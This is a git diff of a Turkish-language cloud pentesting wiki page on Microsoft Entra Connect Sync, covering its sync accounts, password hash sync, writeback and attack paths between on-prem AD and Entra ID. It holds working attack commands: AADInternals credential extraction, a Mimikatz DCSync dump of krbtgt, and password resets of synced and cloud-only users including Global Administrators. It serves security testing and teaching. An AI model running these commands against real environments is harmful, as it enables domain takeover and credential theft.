diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.md index 503370c35..2812637e0 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.md @@ -4,61 +4,65 @@ ## Temel Bilgiler -[Belgelerden:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sync-whatis) Microsoft Entra Connect senkronizasyon hizmetleri (Microsoft Entra Connect Sync), Microsoft Entra Connect'in ana bileşenidir. Bu, yerel ortamınız ile Microsoft Entra ID arasında kimlik verilerini senkronize etmekle ilgili tüm işlemleri yönetir. +[Belgelerden:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sync-whatis) Microsoft Entra Connect synchronization services (Microsoft Entra Connect Sync), Microsoft Entra Connect'in ana bileşenlerinden biridir. On-premises ortamınız ile Microsoft Entra ID arasındaki kimlik verilerinin senkronizasyonu ile ilgili tüm işlemleri yönetir. + +Sync servisi iki bileşenden oluşur: on-premises tarafındaki **Microsoft Entra Connect Sync** bileşeni ve Microsoft Entra ID tarafındaki **Microsoft Entra Connect Sync service** adlı servis bileşeni. + +Kullanmak için AD ortamınızdaki bir sunucuya **`Microsoft Entra Connect Sync`** ajanının kurulması gerekir. Bu ajan AD tarafındaki senkronizasyondan sorumlu olacaktır. -Bunu kullanmak için, AD ortamınızdaki bir sunucuya **`Microsoft Entra Connect Sync`** ajanını kurmanız gerekmektedir. Bu ajan, AD tarafındaki senkronizasyonu yönetmekle sorumlu olacaktır.
-**Connect Sync**, temelde **AD'den Entra ID'ye kullanıcıları senkronize etmenin "eski" Azure yoludur.** Yeni önerilen yol, **Entra Cloud Sync** kullanmaktır: +**Connect Sync** temelde AD'den Entra ID'ye kullanıcıları senkronize etmenin "eski" Azure yoludur. Yeni önerilen yol ise **Entra Cloud Sync** kullanmaktır: {{#ref}} az-cloud-sync.md {{#endref}} -### Oluşturulan İlkeler +### Oluşturulan Principals -- **`MSOL_`** hesabı, yerel AD'de otomatik olarak oluşturulur. Bu hesaba **Dizin Senkronizasyon Hesapları** rolü verilir (bkz. [belgeler](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)), bu da yerel AD'de **replication (DCSync) izinlerine** sahip olduğu anlamına gelir. -- Bu, bu hesabı ele geçiren herkesin yerel alanı ele geçirebileceği anlamına gelir. -- Yerel AD'de özel bir varsayılan ayrıcalığı olmayan bir yönetilen hizmet hesabı **`ADSyncMSA`** oluşturulur. -- Entra ID'de, bir sertifika ile birlikte **`ConnectSyncProvisioning_ConnectSync_`** Servis Prensibi oluşturulur. +- **`MSOL_`** hesabı on-prem AD'de otomatik olarak oluşturulur. Bu hesaba bir **Directory Synchronization Accounts** rolü verilir (bkz. [documentation](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)) ve bu da hesabın on-prem AD içinde **replication (DCSync) izinlerine sahip olduğu** anlamına gelir. +- Bu, bu hesabı ele geçiren herhangi birinin on-premise domain'i ele geçirebileceği anlamına gelir. +- On-prem AD'de özel hiçbir varsayılan ayrıcalığı olmayan yönetilen bir servis hesabı **`ADSyncMSA`** oluşturulur. +- Entra ID içinde bir sertifika ile birlikte Service Principal **`ConnectSyncProvisioning_ConnectSync_`** oluşturulur. -## Parolaları Senkronize Et +## Parolaları Senkronize Etme ### Parola Hash Senkronizasyonu -Bu bileşen, kullanıcıların Entra ID'ye bağlanmak için AD parolalarını kullanabilmesi için **AD'den Entra ID'ye parolaları senkronize etmek** için de kullanılabilir. Bunun için, AD sunucusunda kurulu Microsoft Entra Connect Sync ajanında parola hash senkronizasyonuna izin vermek gerekmektedir. +Bu bileşen ayrıca AD'den Entra ID'ye parolaları senkronize etmek için kullanılabilir; böylece kullanıcılar AD parolalarını Entra ID'ye bağlanmak için kullanabilirler. Bunun için AD sunucusuna kurulu olan Microsoft Entra Connect Sync ajanında password hash synchronization'ın etkinleştirilmesi gerekir. -[Belgelerden:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-phs) **Parola hash senkronizasyonu**, hibrit kimlik elde etmek için kullanılan oturum açma yöntemlerinden biridir. **Azure AD Connect**, yerel bir Active Directory örneğinden bulut tabanlı bir Azure AD örneğine bir kullanıcının parolasının hash'inin hash'ini senkronize eder. +[Belgelerden:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-phs) **Password hash synchronization**, hibrit kimliği sağlamak için kullanılan oturum açma yöntemlerinden biridir. **Azure AD Connect**, bir kullanıcının parolasının hash'inin hash'ini on-premises Active Directory örneğinden bulut tabanlı Azure AD örneğine senkronize eder. -Temelde, tüm **kullanıcılar** ve **parola hash'lerinin hash'i** yerelden Azure AD'ye senkronize edilir. Ancak, **düz metin parolalar** veya **orijinal** **hash'ler** Azure AD'ye gönderilmez. +Temelde tüm **kullanıcılar** ve parolaların **hashlerinin hash'i** on-prem'den Azure AD'ye senkronize edilir. Ancak **düz metin parolalar** veya **orijinal** **hash'ler** Azure AD'ye gönderilmez. -**Hash senkronizasyonu** her **2 dakikada** bir gerçekleşir. Ancak, varsayılan olarak, **parola süresi dolma** ve **hesap** **süresi dolma** Azure AD'de **senkronize edilmez**. Yani, **yerel parolası süresi dolmuş** (değiştirilmemiş) bir kullanıcı, eski parolasıyla **Azure kaynaklarına erişmeye** devam edebilir. +**Hash'lerin senkronizasyonu** her **2 dakikada** bir gerçekleşir. Ancak varsayılan olarak **parola süresi** ve **hesap süresi** Azure AD'ye **senkronize edilmez**. Yani on-prem parolası süresi dolmuş (değiştirilmemiş) bir kullanıcı, eski parola ile Azure kaynaklarına erişmeye devam edebilir. -Yerel bir kullanıcı bir Azure kaynağına erişmek istediğinde, **kimlik doğrulama Azure AD'de gerçekleşir**. +Bir on-prem kullanıcı Azure kaynağına erişmek istediğinde, **kimlik doğrulama Azure AD üzerinde gerçekleşir**. > [!NOTE] -> Varsayılan olarak, **`adminCount`** niteliği 1 olan bilinen ayrıcalıklı grupların kullanıcıları, güvenlik nedenleriyle Entra ID ile **senkronize edilmez**. Ancak, bu niteliğe sahip olmayan veya doğrudan yüksek ayrıcalıklar atanmış diğer kullanıcılar **senkronize edilebilir**. +> Varsayılan olarak `adminCount` özniteliği 1 olan Domain Admins gibi bilinen ayrıcalıklı grupların kullanıcıları güvenlik nedenleriyle Entra ID ile senkronize edilmez. Ancak bu özniteliğe sahip olmayan ayrıcalıklı grupların üyeleri ya da doğrudan yüksek ayrıcalıklar atanmış diğer kullanıcılar **senkronize edilebilir**. -### Parola Yazma -Bu yapılandırma, bir kullanıcı Entra ID'de parolasını değiştirdiğinde **parolaları Entra ID'den AD'ye senkronize etmeye** olanak tanır. Parola yazma işleminin çalışabilmesi için, AD'de otomatik olarak oluşturulan `MSOL_` kullanıcısına [belgelerde belirtilen daha fazla ayrıcalık verilmesi](https://learn.microsoft.com/en-us/entra/identity/authentication/tutorial-enable-sspr-writeback) gerekmektedir, böylece **AD'deki herhangi bir kullanıcının parolasını değiştirebilir**. +### Password Writeback -Bu, ele geçirilmiş bir Entra ID'den AD'yi ele geçirmek için özellikle ilginçtir çünkü "neredeyse" herhangi bir kullanıcının parolasını değiştirebilirsiniz. +Bu yapılandırma, bir kullanıcı Entra ID'de parolasını değiştirdiğinde **parolaların Entra ID'den AD'ye senkronize edilmesine** izin verir. Password writeback'in çalışması için AD'de otomatik oluşturulan `MSOL_` kullanıcısına [dokümanda belirtildiği gibi](https://learn.microsoft.com/en-us/entra/identity/authentication/tutorial-enable-sspr-writeback) daha fazla ayrıcalık verilmesi gerekir; böylece AD'deki herhangi bir kullanıcının parolasını **değiştirebilecek** duruma gelir. -Alan yöneticileri ve bazı ayrıcalıklı gruplara ait diğer kullanıcılar, grup **`adminCount` niteliği 1** olduğunda çoğaltılmaz. Ancak, bu gruplara ait olmadan AD içinde yüksek ayrıcalıklar atanmış diğer kullanıcıların parolaları değiştirilebilir. Örneğin: +Bu, özellikle ele geçirilmiş bir Entra ID'den AD'yi ele geçirmek için ilginçtir çünkü neredeyse herhangi bir kullanıcının parolasını değiştirebilirsiniz. -- Doğrudan yüksek ayrıcalıklar atanmış kullanıcılar. -- **`DNSAdmins`** grubundaki kullanıcılar. -- GPO'lar oluşturup bunları OU'lara atayan **`Group Policy Creator Owners`** grubundaki kullanıcılar, oluşturdukları GPO'ları değiştirebilir. -- Active Directory'ye sertifika yayınlayabilen **`Cert Publishers Group`** grubundaki kullanıcılar. -- **`adminCount` niteliği 1** olmayan yüksek ayrıcalıklara sahip diğer gruplardaki kullanıcılar. +Domain admin'ler ve bazı ayrıcalıklı gruplara ait diğer kullanıcılar, grup `adminCount` özniteliği 1 ise replike edilmezler. Ancak AD içinde doğrudan yüksek ayrıcalıklar verilmiş ve bu gruplardan hiçbirine ait olmayan diğer kullanıcıların parolaları değiştirilebilir. Örneğin: -## AD'den Entra ID'ye Geçiş +- Doğrudan yüksek ayrıcalık atanmış kullanıcılar. +- **`DNSAdmins`** grubundan kullanıcılar. +- GPO oluşturan ve bunları OU'lara atayan **`Group Policy Creator Owners`** grubundan kullanıcılar, oluşturdukları GPO'ları değiştirebilirler. +- Active Directory'ye sertifika yayımlayabilen **`Cert Publishers Group`** üyeleri. +- `adminCount` özniteliği 1 olmayan, yüksek ayrıcalıklara sahip herhangi bir diğer grup üyesi. -### Connect Sync'i Listeleme +## Pivoting AD --> Entra ID -Kullanıcıları kontrol et: +### Enumerating Connect Sync + +Check for users: ```bash # Check for the users created by the Connect Sync Install-WindowsFeature RSAT-AD-PowerShell @@ -76,25 +80,26 @@ $searcher.FindAll() $searcher.Filter = "(samAccountName=Sync_*)" $searcher.FindAll() ``` -**Connect Sync yapılandırmasını** kontrol edin (varsa): +Varsa **Connect Sync configuration**'ı kontrol edin: ```bash az rest --url "https://graph.microsoft.com/v1.0/directory/onPremisesSynchronization" # Check if password sychronization is enabled, if password and group writeback are enabled... ``` -### Parolaları Bulma +### Parolaları bulma -**`MSOL_*`** kullanıcısının (ve oluşturulmuşsa **Sync\_\*** kullanıcısının) parolaları **SQL sunucusunda** **Entra ID Connect'in kurulu olduğu** sunucuda **saklanmaktadır.** Yöneticiler, bu ayrıcalıklı kullanıcıların parolalarını düz metin olarak çıkarabilir.\ -Veritabanası `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf` konumundadır. +**`MSOL_*`** kullanıcısının parolaları (ve oluşturulduysa **Sync\_\*** kullanıcısının parolaları) **Entra ID Connect'in yüklü olduğu sunucudaki bir SQL server** üzerinde **saklanır.** Yöneticiler bu ayrıcalıklı kullanıcıların parolalarını düz metin olarak çıkartabilirler.\ -Şifrelenmiş olan bir tablo üzerinden yapılandırmayı çıkarmak mümkündür: +Veritabanı şu konumdadır: `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf`. + +Tablolardan birinden yapılandırmayı çıkarmak mümkündür; bunlardan biri şifrelenmiştir: `SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;` -**Şifrelenmiş yapılandırma**, **DPAPI** ile şifrelenmiştir ve on-prem AD'deki **`MSOL_*`** kullanıcısının parolalarını ve AzureAD'deki **Sync\_\*** parolasını içermektedir. Bu nedenle, bunları ele geçirerek AD ve AzureAD'ye yetki yükseltmek mümkündür. +**encrypted configuration** DPAPI ile şifrelenmiştir ve içinde on-prem AD'deki `MSOL_*` kullanıcısının parolalarını ve AzureAD'deki **Sync\_\*** kullanıcısının parolasını içerir. Bu yüzden bunların ele geçirilmesi halinde AD ve AzureAD'e privesc yapmak mümkündür. -Bu kimlik bilgilerin nasıl saklandığı ve çözüldüğüne dair [tam bir genel bakış bu konuşmada bulunmaktadır](https://www.youtube.com/watch?v=JEIR5oGCwdg). +Bu kimlik bilgileri nasıl saklandığı ve çözüldüğüne dair tam bir özet için şu konuşmaya bakabilirsiniz: [full overview of how these credentials are stored and decrypted in this talk](https://www.youtube.com/watch?v=JEIR5oGCwdg). -### MSOL\_\* Kullanımının Kötüye Kullanılması +### MSOL\_\*'ın kötüye kullanımı ```bash # Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module Install-Module -Name AADInternals -RequiredVersion 0.9.0 # Uninstall-Module AADInternals if you have a later version @@ -112,35 +117,35 @@ runas /netonly /user:defeng.corp\MSOL_123123123123 cmd Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"' ``` > [!WARNING] -> Önceki saldırılar, Entra ID kullanıcısı olan `Sync_*`'ye bağlanmak için diğer şifreyi tehlikeye attı ve ardından Entra ID'yi tehlikeye soktu. Ancak, bu kullanıcı artık mevcut değil. +> Önceki saldırılarda diğer parola ele geçirilerek `Sync_*` adlı Entra ID kullanıcısına bağlanılmış ve ardından Entra ID ele geçirilmişti. Ancak artık bu kullanıcı mevcut değil. -### ConnectSyncProvisioning_ConnectSync\_'yi Kötüye Kullanma +### ConnectSyncProvisioning_ConnectSync\_ Kötüye Kullanımı -Bu uygulama, herhangi bir Entra ID veya Azure yönetim rolü atanmış olmadan oluşturulmuştur. Ancak, aşağıdaki API izinlerine sahiptir: +Bu uygulama, herhangi bir Entra ID veya Azure yönetim rolü atanmış olarak oluşturulmamıştır. Ancak, aşağıdaki API izinlerine sahiptir: -- Microsoft Entra AD Senkronizasyon Servisi +- Microsoft Entra AD Synchronization Service - `ADSynchronization.ReadWrite.All` -- Microsoft şifre sıfırlama servisi +- Microsoft password reset service - `PasswordWriteback.OffboardClient.All` - `PasswordWriteback.RefreshClient.All` - `PasswordWriteback.RegisterClientVersion.All` -Bu uygulamanın SP'sinin, belgelenmemiş bir API kullanarak bazı ayrıcalıklı eylemleri gerçekleştirmek için hala kullanılabileceği belirtiliyor, ancak bildiğim kadarıyla henüz bir PoC bulunmamıştır.\ -Her durumda, bunun mümkün olabileceğini düşünerek, bu hizmet ilkesine giriş yapmak için sertifikayı nasıl bulabileceğimizi ve bunu kötüye kullanmayı daha fazla keşfetmek ilginç olacaktır. +Bu uygulamanın SP'sinin belgelenmemiş bir API kullanarak bazı ayrıcalıklı eylemleri gerçekleştirmek için hâlâ kullanılabileceği belirtiliyor, ancak bildiğim kadarıyla henüz bir PoC bulunamadı.\ +Her durumda, bunun mümkün olabileceğini düşünerek, bu service principal olarak oturum açmak için sertifikayı nasıl bulacağımızı araştırmak ve onu kötüye kullanmayı denemek ilginç olur. -Bu [blog yazısı](https://posts.specterops.io/update-dumping-entra-connect-sync-credentials-4a9114734f71), `Sync_*` kullanıcısından bu hizmet ilkesine geçişten kısa bir süre önce yayınlandı ve sertifikanın sunucu içinde saklandığını, bunun bulunabileceğini, PoP (Sahiplik Kanıtı) ve grafik token oluşturulabileceğini ve bununla birlikte hizmet ilkesine yeni bir sertifika ekleyebileceğini açıkladı (çünkü bir **hizmet ilkesi** her zaman kendisine yeni sertifikalar atayabilir) ve ardından bunu SP olarak sürekliliği sağlamak için kullanabilir. +Bu değişikliğin `Sync_*` kullanıcısından bu service principal'e geçişinden kısa süre sonra yayımlanan bu [blog post](https://posts.specterops.io/update-dumping-en tra-connect-sync-credentials-4a9114734f71), sertifikanın sunucunun içinde saklandığını ve onu bulup PoP (Proof of Possession) oluşturmak ve graph token üretmek mümkün olduğunu; bununla birlikte service principal'a yeni bir sertifika ekleyebildiğinizi (çünkü bir **service principal** her zaman kendisine yeni sertifikalar atayabilir) ve ardından bunu SP olarak kalıcılığı sürdürmek için kullanabildiğinizi açıklıyordu. -Bu eylemleri gerçekleştirmek için aşağıdaki araçlar yayınlanmıştır: [SharpECUtils](https://github.com/hotnops/ECUtilities/tree/main/SharpECUtils). +Bu eylemleri gerçekleştirmek için şu araçlar yayımlanmıştır: [SharpECUtils](https://github.com/hotnops/ECUtilities/tree/main/SharpECUtils). -Deneyimlerime göre, sertifika, önceki aracın aradığı yerde artık saklanmamaktadır ve bu nedenle, araç artık çalışmamaktadır. Bu nedenle, daha fazla araştırma gerekebilir. +[Bu soru](https://github.com/hotnops/ECUtilities/issues/1#issuecomment-3220989919)'ya göre, sertifikayı bulmak için aracı, **`miiserver` sürecinin token'ını çalmış bir süreçten** çalıştırmanız gerekir. -### Sync\_\*'yı Kötüye Kullanma [KULLANIMDIŞI] +### Sync\_\* Kötüye Kullanımı [DEPRECATED] > [!WARNING] -> Daha önce, Entra ID'de `Sync_*` adında çok hassas izinlere sahip bir kullanıcı oluşturulmuştu; bu, herhangi bir kullanıcının (Global Yöneticiler dahil) şifresini değiştirmek veya bir hizmet ilkesine yeni bir kimlik bilgisi eklemek gibi ayrıcalıklı eylemleri gerçekleştirmeye izin veriyordu. Ancak, Ocak 2025'ten itibaren bu kullanıcı varsayılan olarak artık oluşturulmamaktadır, çünkü artık **`ConnectSyncProvisioning_ConnectSync_`** Uygulaması/SP'si kullanılmaktadır. Ancak, bazı ortamlarda hala mevcut olabilir, bu nedenle kontrol etmeye değer. +> Önceden `Sync_*` adlı bir kullanıcı Entra ID'de çok hassas izinlerle oluşturuluyordu; bu izinler herhangi bir kullanıcının parolasını değiştirmek veya bir service principal'a yeni bir kimlik bilgisi eklemek gibi ayrıcalıklı işlemleri gerçekleştirmeye olanak sağlıyordu. Ancak, Jan2025'ten itibaren bu kullanıcı varsayılan olarak artık oluşturulmamaktadır; artık Application/SP **`ConnectSyncProvisioning_ConnectSync_`** kullanılmaktadır. Yine de bazı ortamlarda hâlâ bulunuyor olabilir, bu yüzden kontrol etmeye değerdir. -**`Sync_*`** hesabını tehlikeye atmak, herhangi bir kullanıcının (Global Yöneticiler dahil) **şifresini sıfırlamak** mümkündür. +**`Sync_*`** hesabı ele geçirildiğinde herhangi bir kullanıcının (Global Administrators dahil) **parolasını sıfırlamak** mümkündür ```bash Install-Module -Name AADInternals -RequiredVersion 0.9.0 # Uninstall-Module AADInternals if you have a later version Import-Module AADInternals @@ -164,7 +169,7 @@ Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustA # Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync) ``` -Aynı zamanda **sadece bulut** kullanıcılarının şifrelerini değiştirmek de mümkündür (bu beklenmedik olsa bile). +Ayrıca **yalnızca cloud kullanıcılarının parolalarını değiştirmek** de mümkün (beklenmedik olsa bile) ```bash # To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID # The CloudAnchor is of the format USER_ObjectID. @@ -173,14 +178,14 @@ Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,Obj # Reset password Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers ``` -Bu kullanıcının şifresini dökmek de mümkündür. +It's also possible to dump the password of this user. > [!CAUTION] -> Diğer bir seçenek, **bir hizmet ilkesi için ayrıcalıklı izinler atamak** olacaktır; bu, **Sync** kullanıcısının **izin** vermeye yetkili olduğu bir işlemdir ve ardından **bu hizmet ilkesine erişmek** bir privesc yöntemi olarak kullanılabilir. +> Başka bir seçenek, **assign privileged permissions to a service principal**, bu işlemi **Sync** kullanıcısının **permissions** ile yapabilmesi ve ardından **access that service principal** ile privesc elde edilmesidir. ### Seamless SSO -Seamless SSO'yu PHS ile kullanmak mümkündür; bu, diğer kötüye kullanımlara karşı savunmasızdır. Bunu kontrol edin: +Seamless SSO'yu PHS ile kullanmak mümkündür; bu başka kötüye kullanımlara karşı savunmasız olabilir. İnceleyin: {{#ref}} az-seamless-sso.md @@ -188,10 +193,10 @@ az-seamless-sso.md ## Pivoting Entra ID --> AD -- Şifre yazma geri dönüşü etkinse, Entra ID ile senkronize olan **AD'deki herhangi bir kullanıcının şifresini değiştirebilirsiniz**. -- Gruplar yazma geri dönüşü etkinse, Entra ID'deki **ayrıcalıklı gruplara kullanıcılar ekleyebilirsiniz**; bu gruplar AD ile senkronizedir. +- Eğer password writeback etkinse, Entra ID ile senkronize edilmiş AD'deki herhangi bir kullanıcının parolasını değiştirebilirsiniz. +- Eğer groups writeback etkinse, AD ile senkronize edilmiş Entra ID'deki ayrıcalıklı gruplara kullanıcılar ekleyebilirsiniz. -## Referanslar +## References - [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs) - [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/)